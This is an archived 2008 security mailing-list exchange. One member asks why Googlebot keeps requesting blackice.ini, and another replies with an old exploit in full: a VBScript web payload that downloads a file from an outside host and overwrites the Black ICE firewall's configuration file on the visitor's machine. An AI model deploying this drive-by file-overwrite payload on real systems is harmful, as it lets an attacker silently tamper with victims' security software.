Dailydave mailing list archives
Re: Google Robot and Black ICE
From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com>
Date: Thu, 21 Feb 2008 00:34:55 -0500
My friend have you forgotten our old Black Ice exploit? God... I had to search my spool for the lulz as they say.
<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite
</script>

maybe this will refresh your memory:

"I would like to see a panel discussion about the disclosure of lame bugs; I am probably going to submit a white paper on it to an upcoming conference. We do not get too concerned about local Window's BO, unless they are in IE, Outlook, etc that would allow for a network vector for compromise. On a system that is more commonly deployed as a multi-user system (unix,linux), of course we consider a local priv escalation serious and provide protection in our host based products. We have about 15,000 corporate customers, including most of the fortune 1000, and in my six years at ISS not a single one has asked me for our products to detect or stop a local windows BO (besides IE or Outlook). I am responsible for every signature in all our products."

can you name that quote? heh
-KF

On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:
Greetings,

I was just looking over some IDS events and noticed that Google keeps looking for blackice.ini on one of our web servers. Does anyone have any idea as to why Google would be doing this? This happens on average 3-5 times a day. Nothing critical, just curious. Every time Google tries the request is denied.

Event:
------
Blocked access to : /blackice.ini
Reason : URL file extension is restricted by policy
SOURCE IP : crawl-66-249-73-113.googlebot.com
Detected On : Web Server Logs, NIDS, Firewall Logs

--
Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45

Join the Netragard, LLC. Linked In Group:
http://www.linkedin.com/e/gis/48683/0B98E1705142

---------------------------------------------------------------
Netragard, LLC - http://www.netragard.com - "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security

<adriel.vcf>
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave